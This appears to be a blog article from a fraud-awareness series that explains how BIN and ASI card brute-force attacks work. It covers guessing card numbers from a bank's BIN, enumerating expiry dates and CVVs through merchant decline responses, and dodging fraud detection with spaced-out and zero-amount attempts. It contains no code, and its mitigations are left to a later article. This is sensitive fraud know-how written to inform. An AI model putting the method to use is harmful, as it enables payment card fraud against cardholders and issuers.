Digital Fraud: BIN/ASI Card Attacks
Details of how attackers are able to launch the most common card attacks on the internet
So, this article is a continuation of the Fraud Attacks articles series https://medium.com/the-innovation/brief-about-digital-fraud-types-96c6210da797. I will explain in detail the technicalities behind BIN/ASI attack, and how the attacker is able to successfully launch it. The mitigation of such attack shall be tackled in another article.
Card Numbers Formula
Before jumping into the details, one shall understand the mathematics behind card numbers.
In most cases, to purchase online services/goods, you need the card number ( aka Primary Account Number, or PAN), along with expiry date and CVV. In some special cases where the transactions are recurrent, both PAN and Expiry date may only be entered. The transaction type is referred to as the MOTO transaction in the latter scenario.
For the PAN, It’s composed mostly of 16 digits, where the first 6 digits are considered the Bank Identification Number (aka BIN) or Issuer Identification Number that identifies the bank issuing the card along with the type of the card whether Platinum credit, debit or others. As general information, the first one to two digits represents the card brand. For example:
- Amex bin list: Card numbers start with a 37.
- Visa bin list: Card numbers start with a 4.
- MasterCard bin list: Card numbers start with the numbers 51 through 55.
- Diners Club bin list: Card numbers begin with 300 through 305, 36, or 38.
- Discover bin list: Card numbers begin with 6011 or 65.
- JCB bin list: Card numbers begin with 35.
Following the BIN, the next 9 digits represent the account number, while the last digit is Luhn check digit. The last 16th Luhn digit is calculated based on the first 15 digits. So from a security perspective, the real sensitive digits start from the 7th digital up till the 15th digit, which is the account number.
Attack Launch
- Targeting the BIN
As the attack name implies, BIN Attacks targets an issuer in order to identify valid card credentials through guessing without direct interaction with the cardholder. This is possible through attempting to brute force the card number through performing fake online payment transactions. The attacker selects first the target issuer through one of the public BIN lists i.e. https://binlists.com/bybank.
2. Guessing the account number
For guessing the account number, attackers usually either try sequential numbers sequential, or they would just generate random 9 digits.
Through the BIN target list along with the guessed account number, they can generate the last Luhn 16th digit.For fun, below are links for sites that generate fake cards:
https://www.bincodes.com/bin-creditcard-generator/
With that mathematical correct PAN, attackers try it out across a list of vulnerable merchants’ pool websites for checking the validity of the PAN. Of course, they will supply a fake expiry date, CVV for the payment gateway to accept the transaction.
Well, on many payment gateways, upon receiving such transaction, the payment server responds with “Invalid card” which is then captured by the attacker. In that case, the malicious user re-guesses the following sequential card number. If you calculate it, there are around 10⁹ possibilities that are considered large. To shrink down the number of permutations, attackers start their guessing sequence with a valid card number then run sequentially the numbers based on that. That could dramatically reduce the possibility of only 1000 hits.
3. Extracting the expiry date
Once having valid PAN, the next step is to extract its correct expiration date. Most issuers set the card expiration date to max 5 years. That would equate to 12*5 = 60 trials. Such hits can be easily guessed using the pool of vulnerable merchants sites. Upon receiving, through any of these attempted requests, declines/error response due to the invalid CVV, the attacker would know the expiry date of that request is valid.
4. Finally, the tricky CVV
Now, the CVV is the only remaining component to guess. There would be around 1000 combinations to try. This gets tricky at that level, as there are multiple fraud detection and throttling system that can block temporarily or even permanently the card. The attackers, at this stage, take extra precautions through widening the durations between attempts and using a bigger pool of merchants.
Note:
ASI Brute-forcing is a derivation of the BIN attack, where the malicious user attempts to brute-force cards by performing online transactions with Zero amount. This is usually commonly preferred trick among attackers to keep a low profile as ASI transaction types don’t have the same fraud detection and may not raise the same fraud alerting caused by transactions with an amount greater than Zero.
What to do?
For sure, there are many detection and prevention to help reduce the risk of exposing card credentials through such an attack. I’ll be covering the common mitigation techniques on the various merchants, payment gateways or issuers layers in another article. So Stay tight as more to come. Also, If you are interested in covering the full Fraud series, here you go https://medium.com/the-innovation/brief-about-digital-fraud-types-96c6210da797 :)
